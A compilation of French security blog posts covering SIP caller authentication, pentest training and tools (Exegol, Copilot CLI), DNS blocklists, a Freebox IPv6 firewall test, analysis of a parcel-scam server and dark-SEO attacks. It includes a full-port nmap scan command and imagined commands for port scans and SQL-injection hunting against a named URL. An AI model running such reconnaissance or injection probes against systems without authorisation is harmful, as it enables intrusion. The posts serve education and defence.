• Conservation de l'en-tête : Les opérateurs de transit doivent conserver l'en-tête "Identity" pour permettre la vérification ultérieure.

5. Vérification par l'opérateur de terminaison

• Extraction du jeton : L'opérateur de terminaison extrait le jeton PASSporT de l'en-tête "Identity".
• Validation de la signature : En utilisant le certificat public de l'opérateur d'origine, l'opérateur de terminaison vérifie la signature numérique pour s'assurer que le jeton n'a pas été altéré.
• Validation des informations : Il compare les informations du jeton avec celles de la trame SIP (numéros, horodatage) pour détecter toute incohérence.

6. Prise de décision

En fonction des résultats de la vérification :

• Appel approuvé : Si la signature est valide et les informations cohérentes, l'appel est acheminé normalement vers le destinataire.
• Appel suspect : Si la signature est invalide ou les informations incohérentes, l'opérateur peut :
  • Marquer l'appel comme suspect.
  • Afficher une alerte au destinataire.
  • Bloquer l'appel conformément à ses politiques internes ou aux réglementations.

7. Gestion des niveaux d'attestation

• Attestation A (Complète) : Haut niveau de confiance. L'opérateur d'origine confirme que l'appelant est autorisé à utiliser le numéro affiché.
• Attestation B (Partielle) : Confiance moyenne. L'opérateur connaît l'appelant mais ne peut pas confirmer le droit d'utiliser le numéro affiché.
• Attestation C (Passerelle) : Faible confiance. L'opérateur n'a pas de relation directe avec l'appelant (par exemple, appels internationaux).

Le niveau d'attestation influence la décision de l'opérateur de terminaison concernant le traitement de l'appel.

8. Infrastructure de certificats

• Autorités de Certification : Les opérateurs doivent obtenir des certificats numériques auprès d'une Autorité de Certification approuvée dans le cadre du MAN.
• Chaîne de confiance : Cette infrastructure garantit que seuls les opérateurs autorisés peuvent signer les appels, assurant ainsi la fiabilité du système.

Conclusion

Le MAN s'implémente sur une trame SIP en ajoutant un en-tête "Identity" contenant un jeton PASSporT signé numériquement. Ce mécanisme permet aux opérateurs de vérifier l'authenticité des appels à chaque étape du transit, renforçant ainsi la confiance dans les communications téléphoniques et luttant efficacement contre les appels frauduleux et l'usurpation de numéros.

Grâce à la collaboration de tous les opérateurs téléphoniques et à des technologies innovantes, vous pourrez d'ici quelques jours répondre à vos appels téléphoniques en toute sérénité. Il reste cependant à voir comment cette transition s'operera entre les différents acteurs français d'ici les prochains jours et si cette technologie permettra de réellement avoir un impact positif sur le nombre d'appels journaliers indésirables.

Vous êtes passionné de cybersécurité ?

Si vous cherchez à approfondir vos connaissances en pentesting, ces 5 ressources incontournables vous fourniront des outils, des techniques, et des perspectives d'experts. Écrites et maintenues par des communautés d'experts en cybersécurité, elles constituent une véritable mine d'or pour ceux qui souhaitent développer des compétences avancées dans l'univers sans fin et impitoyable du pentesting.

Introduction | The Hacker Recipes

Logo

Exploit Notes

Sticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTFs.

Swissky’s adventures into InfoSec World !

Write-ups/CTF & Bug Bounties

Swissky’s adventures into InfoSec World !Swissky’s adventures into InfoSec World !

HackTricks | HackTricks | HackTricks

Logo

GitHub - Hack-with-Github/Awesome-Hacking: A collection of various awesome lists for hackers, pentesters and security researchers

A collection of various awesome lists for hackers, pentesters and security researchers - Hack-with-Github/Awesome-Hacking

GitHubHack-with-Github

Partagez vos trouvailles !

Vous connaissez d'autres ressources intéressantes ? N'hésitez pas à les partager dans le canal #Cybersécurité de notre serveur Discord Geeek.org.

Face à l'augmentation du nombre d'appels de démarchage reçus chaque jour, je suis parti à la recherche d'une application mobile sérieuse capable de filtrer mes appels entrants et de bloquer les appels malveillants ou de démarchage reçus. Une application simple qui n'utiliserait pas les numéros de téléphone comme source de données revendue à des tiers, une application qui n'espionnerait pas ses utilisateurs.

En recherchant sur les stores, je suis tombé sur l'application "Orange Téléphone". Le nom peut vous paraitre curieux, mais il s'agit bien d'une application capable de filtrer les appels provenant de sources indésirables.

Comme je n'ai aucune confiance aux applications gratuites qui accèdent à vos appels téléphoniques, parmi toutes les applications disponibles, j'ai pris la décision de faire confiance à Orange ... qui possède déjà de détail de mes appels téléphoniques.

L'application n'est certes pas toute récente, elle a aujourd'hui 6 ans, mais elle fonctionne parfaitement bien.

Les utilisateurs de l'application peuvent dénoncer des numéros de téléphone malveillants, cette dénonciation est bénéfique à l'ensemble des autres utilisateurs de l'application. Son fonctionnement se base sur l'intelligence collective.

Dites adieu au spam, l'application "Orange Téléphone" est gratuite et disponible sur Android et iOS, sa note est de 4.4 sur iOS et 4.2 sur Android. Bref, c'est une belle petite découverte qui me fait m'évite de répondre à des appels fantômes et surtout qui m'évite de l'énervement inutile. Cet article n'est pas sponsorisé comme l'ensemble des autres contenus de ce blog, je voulais vous profiter de cette découverte que je diffuse largement autour de moi.

Pour aller plus loin dans la démarche de protection contre les appels de démarchage, vous pouvez aussi utiliser le service du gouvernement Bloctel. Il ne vous bloquera pas les appels de l'ensemble des démarcheurs téléphoniques, mais au moins, vous aurez informé les démarcheurs "legaux" que vous ne souhaitez pas être dérangé.

Vous souhaitez vous former à la Cybersécurité et aprendre les bases de la cybersécurité offensive et défensive ?

La Hackthebox Academy propose des formations gratuites dans son catalogue de formation en ligne en plus de son Lab qui permet de s'initier aux tests d'intrusion (pentests).

Quelles sont les formations gratuites ?

Les formations du tiers 0 se composent d'une liste de 20 modules de formation très complets pour débuter dans la cybersécurité :

Les modules de formation simples accessibles pour des débutants :

• Linux Fundamental (6h)
• Introduction to Networking (3h)
• Web Requests (4h)
• Using the Metasploit Framework (5h)
• JavaScript Deobfuscation (4h)
• Windows Fundamentals (6h)
• Attacking Web Applications with Ffuf (5h)
• Introduction to Active Directory (7h)
• Introduction to Web Applications (3h)
• Setting Up Pentests (2h)
• Vulnerability Assessment (2h)
• MacOS Fundamentals (4h)

Les Modules de formation de complexité moyenne :

• File transfers (3h)
• File Inclusion (8h)
• Stack-Based Buffer Overflows on Linux x86 (7h)
• SQL Injection Fundamentals (8h)
• Intro to Network Traffic Analysis (8h)
• Stack-Based Buffer Overflows on Windows x86 (8h)
• Brief Intro to Hardware Attacks (4h)
• Security Incident Reporting (2h) (Tiers 1)

Qu'est-ce qu'un Cube ?

Chacun des modules de formations listés ci-dessus coûte l'équivalent de 10 cubes, il s'agit de la monnaie virtuelle utilisée sur la plateforme Hackthebox.
Ces 10 cubes vous sont restitués une fois le module terminé. Cela signifie qu'avec les 60 cubes offerts lors de la création de votre compte, vous pouvez réaliser l'ensemble des modules du tiers 0 gratuitement.

Ces modules de formation gratuits représentent l'équivalent de 14 jours de formation à raison de 7h d'apprentissage par jour. Cela vous laisse du temps avant de démarrer les formations payantes des tiers 1, 2 et 3 qui possèdent une complexité plus importante.

Hackthebox joue sur la gamification de ses parcours pour vous garder le plus longtemps possible sur la plateforme.

Et ensuite ?

Une fois les formations gratuites réalisées, les modules payants peuvent être accédées :

• A la carte via l'achat de cubes : 100 cubes = 9 euros
• Via un abonnement mensuel à partir de 16 euros = 200 cubes
• Via un abonnement annuel illimité pour le tiers II (410€) et tier III (1055€)

Une fois formé, la plateforme Hackthebox propose différentes certifications payantes qui permettront de valoriser les compétences acquises :

• HTB Certified Penetration Testing Specialist (180€)
• HTB Certified Bug Bounty Hunter (180€)
• HTB Certified Defensive Security Analyst (180€)
• HTB Certified Web Exploitation Expert (300€)

Découvrez la plateforme Hackthebox Academy et profitez d'un crédit gratuit de 60 Cubes grâce à ce lien. Bonne formation !

Exegol est une planète de l’univers de fiction Star Wars qui abrite le culte de l'éternel Sith. C'est aussi une solution professionnelle complète pour réaliser des tests de pénétration, de l'OSINT et de la recherche de vulnérabilités.

Il existe des distributions comme Kali Linux, malheureusement cette solution n'est pas adaptée au milieu du pentesting professionnel.

Si vous avez besoin d'une artillerie d'outils pour réaliser des tests de cybersécurité offensive, Exegol est une solution complète qui s'installe très facilement sous Linux, Mac OS ou Windows.

La seule difficulté est de connaitre la quantité d'outils disponibles et la multitude d'options possibles pour les lancer. Rien que l'utilisation de Nmap est en soit un vrai casse-tête.

nmap  -p-  --open -sS --min-rate 5000 -vvv -"IP" -n -Pn -oG allPorts

La réflexion que je me suis posée cette semaine: Est-ce qu'une solution comme Github Copilot CLI pourrait permettre d'améliorer la productivité d'experts en Cybersécurité utilisant Exegol ? Est-ce qu'un CLI à base d'IA génératrice serait en mesure de proposer des commandes shell facilement en fonction de vos besoins ?

Si vous ne connaissez pas Github Copilot CLI, il s'agit d'une solution bêta de shell intelligent propulsé par Github. Cette solution peut simplifier l'usage des lignes de commande sous Linux. Dans cet article, je vais vous partager mon retour d'expérience dans l'utilisation de Github Copilot CLI pour réaliser des pentests et les alternatives possibles.

Comment fonctionne Exegol ?

Exegol est composée de 3 composants :

• D'un Wrapper Python permettant de simplifier la gestion du paramétrage et du démarrage des images Docker.
• D'images Docker Exegol adaptées à l'usage que vous souhaitez faire d'Exegol : OSINT, Pentest Web ...
• D'un repository d'outils sous forme de répository Git complétant les outils intégrés à l'image Docker.

Exegol fonctionne sous Linux, Mac OS et Windows. Dans mon cas, je l'ai tout simplement installé sous Windows 11 avec Docker Desktop et WSL2.

Exegol fonctionne parfaitement bien avec des plateformes d'apprentissage en cybersécurité comme Hackthebox par exemple, la configuration d'un VPN se fait via l'ajout d'un paramètre "--vpn" lors de l'appel au wrapper Python.

exegol start htb full --vpn "hackthebox.ovpn"

Il est juste important d'être vigilant à l'espace disque consommé par Exegol. L'image docker "full" nécessite pas moins de 50 Go de stockage sur votre disque.
Si vous avez un usage précis d'Exegol, vous pouvez aussi utiliser des images plus petites dédiées à de l'OSINT ou du Pentest pour applications Web.

Quels sont les outils préinstallés dans Exegol ?

Exegol est livré dans sa version "full" avec plus de 350 outils dédiés à la cybersécurité. Exegol est très pratique pour gagner du temps, surtout si vous bénéficiez d'un accès Internet assez limité ou d'un accès Internet filtré.

Il est possible d'instancier l'image Docker par environnement client, projet d'analyse ... Cela vous permet ainsi de bien structurer votre espace de travail et d'isoler les outils mis en oeuvre.

Le côté stateless de Docker permet aussi de garantir une meilleure isolation lors des tests réalisés.

Qu'est-ce Github Copilot CLI ?

La solution Github Copilot CLI est une extension à Github Copilot.
Cette extension permet d'utiliser directement les API d'OpenAI (ChatGPT) pour être plus productif sur l'utilisation d'un terminal.

Github Copilot CLI fonctionne sous la forme d'une commande shell, il vous permet d'expliquer une commande shell ou bien de vous aider à construire une commande très facilement sur la base d'un besoin.

Comment s'installe Github Copilot CLI dans Exegol ?

Github Copilot CLI s'installe très facilement au sein de l'image Docker d'Exegol :

type -p curl >/dev/null || (sudo apt update && sudo apt install curl -y)
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y

Authentifiez vous dans l'outil avec votre compte Github et installez l'extension Github Copilot Cli qui permet de transformer la solution Github CLI en solution intelligente.

gh auth login
gh extension install github/gh-copilot

Comment Github Copilot CLI s'utilise au sein d'Exegol ?

Lancez maintenant la commande suivante :

gh copilot suggest -t shell 'start a python server on port 8000' 

Copilot vous proposera la réponse suivante :

Sur des besoins très simples, Github Coppilot CLI peut vous aider à trouver les options et les outils pour répondre à ce que vous souhaitez réaliser.
Il est même en mesure de produire des scripts complets.

Quelles sont les limites de Github Copilot CLI pour un usage en cybersécurité ?

Github Copilot CLI est très performant pour répondre à des besoins simples sous Linux, mais malheureusement, il ne saura pas forcément vous aider dans l'utilisation des outils de cybersécurité fournis par Exegol.

Il connait moins de 10% des outils fournis par Exegol et ne semble avoir aucune idée de l'utilisation de Metasploit par exemple.

Il est donc très bon pour un usage générique d'un shell Linux, mais ne sera pas pour le moment d'une grande aide pour un usage autour du pentesting avec les outils de pentesting fournis par la solution Exegol.

Comment résoudre cette limitation?

La limitation de Gihub Copilot CLI est liée au fait que le LLM utilisé par l'outil n'a pas été entrainé sur les manuels d'utilisation des outils fournis avec Exegol. Le produit étant en phase beta, cette limitation est peut-être temporaire.

Une solution alternative serait de construire soit même une solution à base d'une architecture de type RAG qui permet d'adosser à un LLM une base de connaissance.

Pour cela vous pouvez installer Ollama et un modèle LLM comme Mistral en local sur votre ordinateur.

Ensuite l'outil CLI cmdh vous permet d'interagir directement avec votre LLM en local sans sortir de votre shell.

Enfin, une solution comme LangChain vous permet d'associer une base de connaissance un LLM grâce à l'utilisation d'embeddings.

En cherchant sur le Web, je suis tombé sur le CLI LLM python de datasette.io qui permet de construire une solution de type RAG très rapidement via un répository de fichiers au format Markdown.

Il en existe probablement d'autres solutions sur le Web, mais je n'ai pas trouvé aujourd'hui d'assistant CLI à base de LLM et de RAG capable d'indexer facilement des documents pour générer des shell prêt à l'utilisation.

C'est peut-être l'occasion de créer un nouveau projet qui s'inspirerait de Github Copilot CLI et d'OpenInterpreter, qui permettrait de simplifier des processus de pentesting ? Quel pourrait être son nom ? Sith

$sith "scan the IP 192.68.1.1 with all ports from 1 to 1000"
$sith "find a sqli on the following url : http://www.geeek.org/?q=param"

Suite la lecture de cet article vous avez des questions ? N'hésitez pas à continuer la discussion sur le serveur Discord Geeek.org.

Cela vous intéresse de protéger automatiquement l'ensemble des périphériques de votre habitation contre les 20 000 sites Web d'escroquerie en ligne ?

Le site Red Flag Domains publie quasi quotidiennement la mise à jour d'une liste noire de domaines à fuir.

Chaque jour, ce n'est pas moins de 5 à 50 domaines qui sont détectés et blacklistés par Nicolas Pawlac grâce aux listes d'enregistrements de noms de domaine publiées par l'Afnic et l'ICANN.

Cette liste de domaines malveillants peut être facilement importée dans des outils de filtrage DNS comme AdGuard Home ou bien PiHole.

Comment fonctionne AdGuard Home ?

AdGuard Home est un logiciel gratuit que je vous avais présenté dans un précédent article et qui assure un contrôle parental en plus de permettre de filtrage DNS au sein de votre réseau local.

AdGuard Home se positionne entre les serveurs DNS sur Internet et vos périphériques.

Une fois installé, Adguard Home intercepte les requêtes de résolutions de noms (DNS) et vérifie préalablement que le nom de domaine recherché ne fait pas partie d'une liste noire avant de retourner une réponse au périphérique qui en fait la demande.

Il joue un rôle d'intermédiaire entre les serveurs DNS sur Internet et votre réseau domestique. Il s'assure que vos périphériques ne cherchent pas à rentrer en contact avec des noms de domaines malveillants.

Comment s'installe AdGuard Home ?

AdGuard Home est disponible sous forme d'image Docker et s'installe assez facilement sur un NAS Synology si vous avez un peu de compétences en informatique. Si vous avez une baie de brassage dans votre logement, Adguard Home peut être une bonne solution de filtrage parental pour l'ensemble de votre réseau.

Adguard fonctionne aussi sous forme de plugins pour navigateur et logiciel de protection pour Windows et Mac OS.

Pour qu'il soit effectif, l'ensemble de vos périphériques doivent l'utiliser comme serveur DNS au sein de votre réseau domestique.
Le plus simple est de le configurer directement au niveau du serveur DHCP de votre domicile, l'adresse IP de l'AdGuard Home sera ainsi utilisée par tous les périphériques configurés avec une adresse IP dynamique.

Comment ajouter la liste Red Flag Domains dans AdGuard Home ?

Pour ajouter la liste de DNS de Red Flag Domains dans Adguard Home, cliquez sur :

Filtres -> Listes de blocage DNS -> Ajouter une liste de blocages -> Ajouter une liste personnalisée"

L'URL de la liste à saisir est celle-ci : https://dl.red.flag.domains/adguard/red.flag.domains.txt

Une fois importée, Adguard Home se chargera de synchroniser cette liste chaque jour pour maintenir sa liste noire toujours à jour. Attention, cette liste ne concerne que des domaines français et ne couvre pas les domaines d'autres pays.

Cette petite astuce vous permettra de protéger facilement votre réseau domestique des attaques de phishing et scamming.

Quelques anecdotes concernant Red Flag Domains ?

Après avoir contacté l'auteur du projet, Nicolas Pawlac, pour lui poser quelques questions, le processus de détection des domaines frauduleux est quasi-automatique. La validation des domaines blacklistés est réalisée manuellement par Nicolas sur la base des nouveaux domaines enregistrés chaque jour.

Il arrive parfois qu'il rencontre des faux positifs, comme par exemple le site mamieestchaude.fr qui n'héberge pas du tout ce que vous imaginez ...

Certains fraudeurs ne se démontent pas et enregistrent des noms de domaine en se présentant comme étant Mel Gibson, Elon Musk, Gustave Flaubert ou en affirmant résider dans la ville alsacienne fictive de Troudbalsheim.

Vous pouvez soutenir le projet et offrir un café via la plateforme Ko-Fi.

Le projet Red Flag Domains est une belle initiative qui permet de rendre le Web plus sécurisé. Bravo Nicolas !

N'hésitez pas à passer sur le serveur Discord Geeek si vous avez des questions ou si vous souhaitez venir discuter.

Parmi les grandes innovations de ces dernières années, l'IPv6 est enfin arrivée sur nos box Internet. L'IPv6 permet de répondre au déficit d'adresses IPv4 pour permettre de raccorder l'ensemble des objets à Internet et d'améliorer les performances du protocole d'adressage.

Petite anecdote, l'IPv6 a été imaginée pendant dans les années 1990 et finalisée par le RFC 2460 en décembre 1998. On savait déjà à l'époque que l'IPv4 n'allait pas être suffisante alors que la majorité d'entre nous n'était pas encore connectée.

À quoi sert l'IPv6 ?

L'IPv6 permet à chaque objet de posséder sa propre adresse IP visible sur Internet et met fin au NAT. Ainsi, vos objets connectés, votre smartphone, votre TV connectée peuvent être accessibles directement sur Internet sans être masqués par votre Freebox.

C'est très pratique, sauf si votre périphérique contient des vulnérabilités exploitables. Dans la mesure où votre Freebox ne joue plus le rôle de pare-feu, vos périphériques connectés en IPv6 se trouvent dénudés sur Internet et potentiellement vulnérables.

Un Firewall IPv6 sur la Freebox ?

La Freebox possède depuis 2019 une option que très peu de personnes connait et qui n'est pas activée par défaut : il s'agit du firewall IPv6.

Cette option est disponible depuis le portail d'administration de votre Freebox et permet à vos périphériques connectés en IPv6 sur votre réseau domestique de ne pas être joignables d'Internet.

Cette option est selon moi indispensable, d'autant plus si vous utilisez des périphériques avec des systèmes obsolètes non mis à jour par leurs constructeurs : caméra, objets connectés, etc. Ces périphériques peuvent être attaqués via l'exploitation de vulnérabilités.

Cela me rappelle les débuts d'Internet où les ordinateurs étaient directement connectés sur Internet avec un modem ADSL en USB sans aucun filtrage. Les ports de partage de fichier étaient disponibles, les ordinateurs étaient fortement vulnérables.

Testons l'efficacité du firewall IPV6 de la Freebox

Pour se faire une idée du risque, le mieux c'est de tester de simuler une attaque depuis Internet.

Dans un premier temps je m'assure que mon PC possède une adresse IPv6 et je lance un service Web sur le port 9001 de l'interface Ethernet. Netcat est un outil très pratique pour ouvrir un port serveur.

Ensuite, je me rends sur ce portail en ligne qui permet de vérifier l'accessibilité d'un port réseau depuis Internet :

https://port.tools/port-checker-ipv6/

Je saisis mon adresse IPv6 affichée juste au dessus du formulaire dans le champ adresse et je positionne 9001 dans le champ port. Le nombre 9001 correspondant au service que j'ai volontairement exposé depuis mon ordinateur.

Bingo ! Le service que j'expose sur mon PC est bien accessible depuis Internet sans aucun filtrage de ma Freebox. C'est aussi le cas de l'ensemble des autres ports que ma machine expose depuis son interface réseau.

Seconde étape, j'active le firewall IPv6 de ma Freebox et je relance le test. Le port 9001 de mon PC n'est plus accessible d'Internet, ma Freebox filtre donc bien les flux entrants et mon PC est correctement protégé par ma Freebox.

Pourquoi l'option Firewall IPv6 n'est-elle pas activée par défaut sur la Freebox ?

Des échanges que j'ai pu voir sur Internet sur ce sujet, ce type de fonctionnalité irait à l'encontre de l'IPv6 selon les puristes. Un ticket dédié à ce sujet existe sur l'outil de ticketing de Free.

Dans tous les cas, je vous conseille fortement d'activer le firewall IPv6 et j'ai du mal à comprendre pourquoi Free n'active pas cette option par défaut pour améliorer la sécurité de ses abonnés. C'est très étrange, si vous avez la raison exacte, n'hésitez pas à la partager sur le serveur Discord Geeek.

De plus en plus je me dis qu'il faudrait que j'installe un vrai firewall Pfsense derrière ma Freebox pour maitriser les flux sortants de mon réseau domestique.
Cela ferait un équipement de plus dans ma baie de brassage qui est déjà bien remplie, mais cela permettrait d'avoir une complète maitrise des flux réseau entrants et sortants sur mon réseau local.

Comme d'habitude, n'hésitez pas à passer faire un tour sur le serveur Discord Geeek et surtout, n'oubliez pas de sortir couvert en IPv6 sur Internet.

Nous recevons de plus en plus de SMS contenant des liens vers des sites Web de Scamming (escroquerie).

Les SMS étant de plus en plus utilisés par les livreurs de colis, l'arnaque aux frais de douane est devenue monnaie courante sur nos Smartphones.

Comment cette arnaque fonctionne-t-elle ?

Vous recevez un SMS vous indiquant que votre colis est bloqué et que vous devez payer des frais de douanes pour le recevoir.

Le lien vous semble officiel, vous cliquez dessus, le site qui s'affiche ressemble comme deux gouttes d'eau à celui de La Poste ou d'un autre site de livraison de colis.

En réalité, il s'agit d'un faux site qui n'a comme seul objectif : vous voler vos données personnelles et votre carte bleue en vous faisant croire qu'un de vos colis est soumis au paiement d'une taxe de douane.

Comment connaitre la localisation de ce site Web ?

Le service NSlookup vous permettra d'obtenir l'adresse IP du serveur qui héberge ce faux site Internet.

https://www.nslookup.io/domains/colis-pickup.info/dns-records/

Dans le cas de 'Colis-pickup.info', voici l'adresse IP du serveur qui héberge ces fausses pages Web de scamming :

213.226.123.172

Pour savoir où il est localisé dans le monde, on peut s'appuyer sur Shodan.io :

https://www.shodan.io/host/213.226.123.172

Le site semble se situer du coté de Saint-Pétersbourg d'après Shodan, bien loin de la France ...

Ce qui est aussi intéressant d'analyser, c'est les nombreux ports que ce serveur expose sur Internet :

Bref, le serveur semble contenir un grand nombre de services. Le pirate doit probablement l'administrer au travers de l'outil d'administration Plesk.

L'obsolescence du serveur SSH est douteuse, il semble contenir de nombreuses vulnérabilités connues. Ce service est probablement utilisé par le pirate pour fermer boutique quand des personnes commencent de tenter de pénétrer le serveur ...

Les activités malveillantes de ce serveur sont-elles déjà connues ?

L'un des services que j'aime bien utiliser est IPAbuseDB qui centralise pour chaque adresse IP sur le Web, un journal des attaques détectées.

Dans notre cas, nous allons voir le passif de cette adresse IP sur le Web :

https://www.abuseipdb.com/check/213.226.123.172

Cette adresse semble assez récente sur Internet, nous avons quelques rapports de phishing mais pas beaucoup plus. Le serveur doit donc être uniquement utilisé pour du scam.

Quels sont les autres sites derrière ce serveur malveillant ?

Pour découvrir les autres noms de domaine utilisés par ce serveur malveillant, vous pouvez vous rendre sur le site AlienVault :

https://otx.alienvault.com/indicator/ip/213.226.123.172

On est sur quelqu'un qui ne fait pas les choses à moitié ... Plusieurs centaines de domaines sont exploités par ce serveur. L'attaque et le mode opératoire doivent donc être industriels.

Ce qui est intéressant, c'est que chaque site derrière ces entrées DNS semble être structurellement différent. C'est un peu comme si chaque site avait été construit par des auteurs différents sur la base d'un SDK commun.

Le serveur ressemble à un site de "Scammer as a service". Vous lui envoyez des utilisateurs et il vous reverse l'argent récupéré en se gardant une petite marge sur chacune des transactions.

Je vais ne pas aller plus loin dans mes analyses. L'arnaque est déjà déclarée sur le site Signal Arnaques :

https://www.signal-arnaques.com/scam/view/738061

J'espère que vous avez apprécié le contenu de cet article.
N'hésitez pas à rejoindre les 1500 membres du serveur Discord Geeek pour continuer la discussion.

Vous connaissez les Hotlinks ou "Liens chauds" en français ? Il s'agit d'une technique qui consiste à intégrer des images provenant d'un autre site Web dans un site Web.

C'est un peu comme si les images de cet article étaient hébergées par des sites tiers sans leur avoir demandé leur accord préalable.

Après mon précédent article concernant le désaveu de sites poubelles sur la Google Search Console, voici un article dédié à l'analyse des Hotlinks mis en place par des Black Hat SEO pour dégrader le référencement de ce blog.

À quoi servent les Hotlinks dans le SEO ?

Les Hotlinks permettent à des Black Hat SEO, ou pirates du SEO, de créer des pages de contenu de faible qualité pointant sur vos contenus multimédias.

Au-delà de la consommation inutile de bande passante et d'une sollicitation des disques sur le serveur hôte, les hotlinks semblent aussi permettre de pénaliser le référencement de contenus sur le Web.

C'est ce que j'ai pu découvrir sur certains de mes articles qui étaient très bien référencés et qui ont perdu en référencement sur Google Search depuis que des dizaines de sites fictifs s'amusent à référencer certaines des images de mes articles.

D'où viennent ces Hotlinks ?

Dans mon cas, les attaques semblent provenir majoritairement de sites hébergés par Blogspot générés par des robots. Mais pas seulement, sur d'autres contenus visés, l'attaque semble provenir de sites piratés avec des pages en mode "cloacking", c'est-à-dire que les liens sur les pages ne sont visibles que par les spiders Web qui les analysent.

https://sears551.blogspot.com/2021/10/download-37-antenne-tv-interieur-tnt.html
https://circu703.blogspot.com/2021/11/get-25-fabriquer-une-antenne-tv-avec.html
https://fabri441.blogspot.com/2021/10/view-28-antenne-radio-fm-interieur.html
http://shubhamstrick.blogspot.com/2021/11/get-33-antenne-tv-numerique-interieure.html
https://anime-iphone.blogspot.com/2021/11/view-20-fabriquer-une-antenne-tv.html
metaylorswiftlyrics.blogspot.com/2021/11/get-19-regler-une-antenne-tv-interieur.html
https://babya930.blogspot.com/2021/06/download-23-faire-une-antenne-tv.html
https://30daylan65.blogspot.com/2021/11/get-31-fabrication-antenne-tv-hd.html
https://manda593.blogspot.com/2021/10/get-19-fabriquer-une-antenne-tv-avec-un.html
https://cuualq992.blogspot.com/2021/11/download-36-comment-fabriquer-une.html
https://ipiemspusat.blogspot.com/2021/10/get-39-fabrication-antenne-tv-hd.html

Ces sites se dénombrent en centaine. J'ai pu les découvrir au travers de la plateforme Ahrefs.

La faible qualité de ces sites semble avoir un impact négatif sur le niveau de référencement de certains de mes contenus qui autrefois étaient bien référencés.

Dans l'exemple des sites ci-dessus, l'article visé concerne mon article concernant la construction d'antenne TNT publié sur ce blog il y a quelques années.

Qui sont les attaquants ?

Les personnes qui sont les commanditaires de cette ces attaques SEO ont probablement des sites Web listés dans les 10 premiers résultats des mots clefs sur lesquels les pages Web ciblées étaient bien référencées.

Les pages fictives créées ciblent à la fois des contenus de mon blog, mais aussi des contenus de sites ayant des contenus bien référencés sur les mêmes mots clefs.

L'attaquant doit pour le coup être celui qui est bien référencé et dont son contenu ne se trouve pas sur ces sites de faible qualité.

Ou alors le contraire ... L'attaquant via son attaque augmente le référencement de mon article et de ses articles en même temps, noyant ainsi les spiders Google sur le côté non naturels des liens générés.

Comment se protéger des Hotlinks ?

La solution la plus simple est d'activer la protection native contre les Hotlinks si votre site est derrière un CDN comme Cloudflare. Cette fonction est disponible directement depuis la rubrique "Scrape Shield" du portail d'administration de Cloudflare.

Cette option bloquera les Hotlinks et vous affichera toutes les tentatives de Hotlinks dans le journal des événements de sécurité de Cloudflare.

Vous avez aussi la possibilité de bloquer les Hotlinks depuis votre CMS, c'est par exemple le cas de Wordpress qui dispose de plugins de protection contre les Hotlinks.

Vous pouvez aussi mettre une règle au niveau de votre serveur Web pour bloquer les Hotlinks. Pour cela, il suffit de contrôler que l'entête HTTP "Referer" contient bien le domaine de votre site Web. Voici un exemple de configuration NGINX permettant de bloquer des requêtes vers des images ne provenant pas de votre site Web.

location ~ .(gif|png|jpe?g)$ {
valid_referers none blocked www.mondomaine.com;
if ($invalid_referer) {return 403;}}

Quels sont les risques de bloquer les Hotlinks ?

En bloquant les Hotlinks, certains agrégateurs de flux RSS ou réseaux sociaux qui ne cachent pas les médias auront un problème d'affichage des images intégrées aux contenus publiés.

Ce filtrage des Hotlinks vous permet d'un côté vous assurer que votre serveur n'est pas détourné par des Black Hat SEO pour fabriquer de faux sites de contenus, mais en même temps ce filtrage peut potentiellement filtrer l'affichage de vos contenus sur certains médias sociaux. C'est donc un paramètre à utiliser avec précaution.

Dans mon cas, j'ai pris la décision de bloquer les Hotlinks pour me protéger du trafic anormal généré sur mon site à cause des ces centaines de sites fictifs.
J'attends quelques semaines pour mesurer l'impact de ce blocage et vous partager une synthèse des gains obtenus. Wait and see ...

Si tu souhaites discuter Cybersécurité, SEO, Web et informatique, n'hésites pas à rejoindre le serveur Discord Geeek.

Il est parfois complexe de bien référencer un site face à des experts en Dark SEO équipés d'outils capables de perturber le référencement de votre site en quelques heures ...

C'est l'expérience que j'ai vécue au cours de ces 24 dernières heures, des dizaines de domaines sont venus référencer mes meilleurs articles avec des URL erronées contenant la chaine '//1000' tout à la fin.

ex: https://www.geeek.org/dark-seo-google-search//1000

Qu'est-ce que le Dark SEO ?

Le Dark SEO est un ensemble de techniques aux frontières de la légalité, visant à améliorer le réfencement de contenus sur le Web.

Dans le cadre de cette attaque visant mon site Geeek.org, l'objectif de l'attaquant est simple: Augmenter artificiellement le nombre de liens entrant en erreur 404 vers mon site pour baisser son niveau de référencement sur les moteurs de recherche.

Quel est l'impact immédiat de l'attaque sur le SEO ?

L'impact constaté au niveau de la Google Search Console est immédiat et se traduit par une baisse directe du nombre d'impressions de 25% environ de mes contenus dans les résultats du moteur de recherche de Google.

Pour couronner le tout, l'attaquant n'a pas utilisé un seul domaine mais des dizaines pour complexifier le blocage et augmenter l'impact négatif de l'attaque de type Dark SEO :

domain:hannahh.at
domain:histiofromfro.com
domain:besalzer.me
domain:amjad-tech.com
domain:lessaneewaldemar.com
domain:wisconsinpiper.com
domain:creativesamplingsolutions.ca
domain:mcmxworld.co.uk
domain:punned-it.ca
domain:evelynholoch.com
domain:planetfitzsimmons.com
domain:laradoro.com
domain:brandarc.biz
domain:loodz88.nl
domain:cnvas.ca
domain:swedco.ca
domain:scotsbarszcz.com
domain:kwsfoto.at
domain:bux-natur.at
domain:outsidetheboat.org
domain:allstarrfcs.com
domain:histiobothbot.com
domain:tfs16metalplating.co.uk
domain:salonbabyline.com
domain:iphimsieunhan.com
domain:dimasoluzionifinanziarie.it
domain:4-d.ca

Comment se protéger de ce type d'attaque ?

Heureusement, pour palier à ces attaques, Google propose un formulaire de désaveu de liens entrants pour indiquer que ces liens ne sont pas de qualité et qu'ils ne doivent pas être pris par Google comme éléments de mesure.

Ce désaveu de liens se fait via la transmission d'un simple fichier texte indiquant les pages Web ou les domaines à désavouer. L'enregistrement de domaines dans cet outil doit se faire avec minutie car il peut dans certains cas être très pénalisant.

D'où viennent ces domaines "poubelles" ?

En analysant l'origine de ces domaines, je n'ai pas vraiment trouvé de points communs au-delà qu'ils sont pour la majorité protégés par le CDN Cloudflare.

